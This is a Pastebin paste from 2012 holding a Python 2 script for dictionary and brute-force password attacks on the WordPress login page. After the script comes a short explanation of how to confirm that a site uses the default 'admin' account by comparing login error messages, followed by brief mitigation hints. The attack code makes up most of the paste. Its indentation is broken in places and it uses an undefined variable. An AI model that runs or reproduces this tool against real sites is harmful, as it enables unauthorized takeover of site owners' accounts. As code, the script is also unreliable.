TrojanSpot

Wordpress BruteForcer Attacked | www.pemula.info

Oct 28th, 2012
307
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.59 KB | None | 0 0
  1. ############## Source code #####################
  2. #!usr/bin/python
  3. # Flaw found on Wordpress
  4. # that allow Dictionnary & Bruteforce attack
  5. # Greetz goes to : NeoMorphS, Tiky
  6. # Vendor : http://wordpress.org/
  7. import urllib , urllib2, sys, string
  8. tab = "%s%s%s"%( string.ascii_letters, string.punctuation, string.digits )
  9. tab = [  i for i in tab ]
  10. def node( table, parent, size ):
  11.     if size == 0:
  12.         pass
  13.     else:
  14.         for c in table:
  15.             string = "%s%s"%( parent, c )
  16.                         data = {'log': sys.argv[2],
  17.                                 'pwd': string}
  18.                         print "[+] Testing : "+string
  19.                         request = urllib2.Request(server, urllib.urlencode(data))
  20.                         f = urllib2.urlopen(request).read()
  21.                         if not "Incorrect password.</div>" in f: print "[!] Password is : "+mot ; break
  22.             node( table, string, size-1 )
  23.  
  24. def bruteforce( table, size ):
  25.     for c in table:
  26.         node( table, c, size-1 )
  27.        
  28. if (len(sys.argv) < 3):
  29.     print "Usage : float.py <server> <user> <choice> <dico-characters>"
  30.     print "\nDefault: User is 'admin'"
  31.     print "Choice : 1} Dictionnary Attack, use dictionnary file"
  32.     print "         2} Bruteforce Attack, use number of character for password"
  33.    
  34. else:
  35.     server = sys.argv[1]
  36.     if sys.argv[3] == "1":
  37.     a , b = open(sys.argv[4],'r') , 0
  38.     for lines in a: b = b + 1
  39.     a.seek(0)  
  40.     c = 0
  41.     while (c < b):
  42.         mot = a.readline().rstrip()
  43.         data = {'log': sys.argv[2],
  44.                 'pwd': mot}
  45.         print "[+] Testing : "+mot
  46.         request = urllib2.Request(server, urllib.urlencode(data))
  47.         f = urllib2.urlopen(request).read()
  48.         if not "Incorrect password.</div>" in f: print "[!] Password is : "+mot ; break
  49.         else: c = c + 1 ; pass
  50.     if sys.argv[3] == "2":
  51.     print "[-] Server is : "+server
  52.     print "[-] User is : "+sys.argv[2]
  53.     print "[-] Number of characters are : "+sys.argv[4]
  54.         number = int(sys.argv[4])
  55.         bruteforce( tab, number )
  56. ############## Source code #####################
  57.  
  58. The problem is : many time, the default user who is created is : admin, then you can try to crack the password, to stop that, you can use image confirmation or a limit for the connection (for example, only 5 tests).
  59.  
  60. To know if "admin" is the default user, you can try to go to the login page : http://site.com/wp-login.php and you try ; login : admin, pass : test (or anything else).
  61.  
  62. if "Wrong password" is printed on the page, the default user is admin, but if there is : "Wrong Username" then it's not the default password ;)
  63.  
  64. Kad'
Add Comment
Please, Sign In to add comment